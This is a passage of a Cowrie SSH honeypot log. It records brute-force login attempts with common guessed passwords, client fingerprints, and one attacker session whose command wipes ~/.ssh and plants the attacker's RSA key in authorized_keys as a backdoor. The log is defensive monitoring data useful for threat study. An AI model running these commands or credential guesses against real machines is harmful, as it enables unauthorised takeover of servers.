ha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:29:14.350368Z","src_ip":"212.227.235.229","session":"a12f80df33fa"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:29:15.517434Z","src_ip":"212.227.235.229","session":"a12f80df33fa"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:15.807198Z","src_ip":"212.227.235.229","session":"8ce3461cc64c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:15.808176Z","src_ip":"212.227.235.229","session":"a12f80df33fa"}
{"eventid":"cowrie.session.closed","duration":"20.0","message":"Connection lost after 20.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:18.001502Z","src_ip":"212.227.235.229","session":"cae41eb88b19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57516,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe994283995e","protocol":"ssh","message":"New connection: 212.227.235.229:57516 (1.2.3.4:22) [session: fe994283995e]","sensor":"my-vps","timestamp":"2025-08-31T06:29:30.868167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:29:31.581041Z","src_ip":"212.227.235.229","session":"fe994283995e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:29:31.581760Z","src_ip":"212.227.235.229","session":"fe994283995e"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"P@ssw0rd123","message":"login attempt [tomcat/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:29:36.971412Z","src_ip":"212.227.235.229","session":"fe994283995e"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:38.754261Z","src_ip":"212.227.235.229","session":"fe994283995e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:40.934922Z","src_ip":"79.124.8.120","session":"bcce22cb053b"}
{"eventid":"cowrie.session.closed","duration":180.08008980751038,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:40.940447Z","src_ip":"79.124.8.120","session":"bcce22cb053b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43542,"dst_ip":"1.2.3.4","dst_port":22,"session":"32876e3f5d15","protocol":"ssh","message":"New connection: 212.227.235.229:43542 (1.2.3.4:22) [session: 32876e3f5d15]","sensor":"my-vps","timestamp":"2025-08-31T06:29:46.115725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:29:46.118552Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:29:46.328583Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.login.success","username":"root","password":"q1w2e3r4!","message":"login attempt [root/q1w2e3r4!] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:29:47.169638Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:29:47.610293Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:29:47.611130Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:29:47.612081Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:47.822641Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:29:48.744352Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:29:48.745034Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:29:48.960260Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:48.961264Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":16002,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d55c380b144","protocol":"ssh","message":"New connection: 212.227.235.229:16002 (1.2.3.4:22) [session: 1d55c380b144]","sensor":"my-vps","timestamp":"2025-08-31T06:29:49.190360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:29:49.192931Z","src_ip":"212.227.235.229","session":"1d55c380b144"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:29:49.423272Z","src_ip":"212.227.235.229","session":"1d55c380b144"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:29:50.347801Z","src_ip":"212.227.235.229","session":"1d55c380b144"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:51.581639Z","src_ip":"212.227.235.229","session":"1d55c380b144"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64447,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ab8c9f0bf88","protocol":"ssh","message":"New connection: 212.227.235.229:64447 (1.2.3.4:22) [session: 7ab8c9f0bf88]","sensor":"my-vps","timestamp":"2025-08-31T06:29:51.793617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:29:51.795587Z","src_ip":"212.227.235.229","session":"7ab8c9f0bf88"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:29:51.803606Z","src_ip":"212.227.125.160","session":"8f01e8ad3635"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:29:52.008244Z","src_ip":"212.227.235.229","session":"7ab8c9f0bf88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47146,"dst_ip":"1.2.3.4","dst_port":22,"session":"74191c30d658","protocol":"ssh","message":"New connection: 212.227.125.160:47146 (1.2.3.4:22) [session: 74191c30d658]","sensor":"my-vps","timestamp":"2025-08-31T06:29:52.311981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:29:52.821484Z","src_ip":"212.227.125.160","session":"74191c30d658"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:29:52.822263Z","src_ip":"212.227.125.160","session":"74191c30d658"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:29:52.866165Z","src_ip":"212.227.235.229","session":"7ab8c9f0bf88"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:53.081206Z","src_ip":"212.227.235.229","session":"7ab8c9f0bf88"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:53.082202Z","src_ip":"212.227.235.229","session":"32876e3f5d15"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"P@ssw0rd123","message":"login attempt [tomcat/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:29:54.793854Z","src_ip":"212.227.125.160","session":"74191c30d658"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:56.696380Z","src_ip":"212.227.125.160","session":"74191c30d658"}
{"eventid":"cowrie.session.closed","duration":"76.6","message":"Connection lost after 76.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:29:58.481935Z","src_ip":"212.227.125.160","session":"8f01e8ad3635"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32972,"dst_ip":"1.2.3.4","dst_port":22,"session":"4eb2a0b67c41","protocol":"ssh","message":"New connection: 212.227.125.160:32972 (1.2.3.4:22) [session: 4eb2a0b67c41]","sensor":"my-vps","timestamp":"2025-08-31T06:30:00.385663Z"}
{"eventid":"cowrie.session.connect","src_ip":"203.195.83.64","src_port":37002,"dst_ip":"1.2.3.4","dst_port":22,"session":"688d329c4471","protocol":"ssh","message":"New connection: 203.195.83.64:37002 (1.2.3.4:22) [session: 688d329c4471]","sensor":"my-vps","timestamp":"2025-08-31T06:30:03.394348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:30:03.395655Z","src_ip":"203.195.83.64","session":"688d329c4471"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T06:30:03.606838Z","src_ip":"203.195.83.64","session":"688d329c4471"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:30:10.611628Z","src_ip":"212.227.125.160","session":"4eb2a0b67c41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:30:10.613398Z","src_ip":"212.227.125.160","session":"4eb2a0b67c41"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:30:11.906063Z","src_ip":"203.195.83.64","session":"688d329c4471"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60810,"dst_ip":"1.2.3.4","dst_port":22,"session":"92e225eacc08","protocol":"ssh","message":"New connection: 217.72.205.35:60810 (1.2.3.4:22) [session: 92e225eacc08]","sensor":"my-vps","timestamp":"2025-08-31T06:30:25.097241Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:30:25.098392Z","src_ip":"217.72.205.35","session":"92e225eacc08"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:30:26.776590Z","src_ip":"212.227.125.160","session":"4eb2a0b67c41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37748,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c69f2e6b496","protocol":"ssh","message":"New connection: 212.227.235.229:37748 (1.2.3.4:22) [session: 7c69f2e6b496]","sensor":"my-vps","timestamp":"2025-08-31T06:30:27.890589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:30:27.891439Z","src_ip":"212.227.235.229","session":"7c69f2e6b496"}
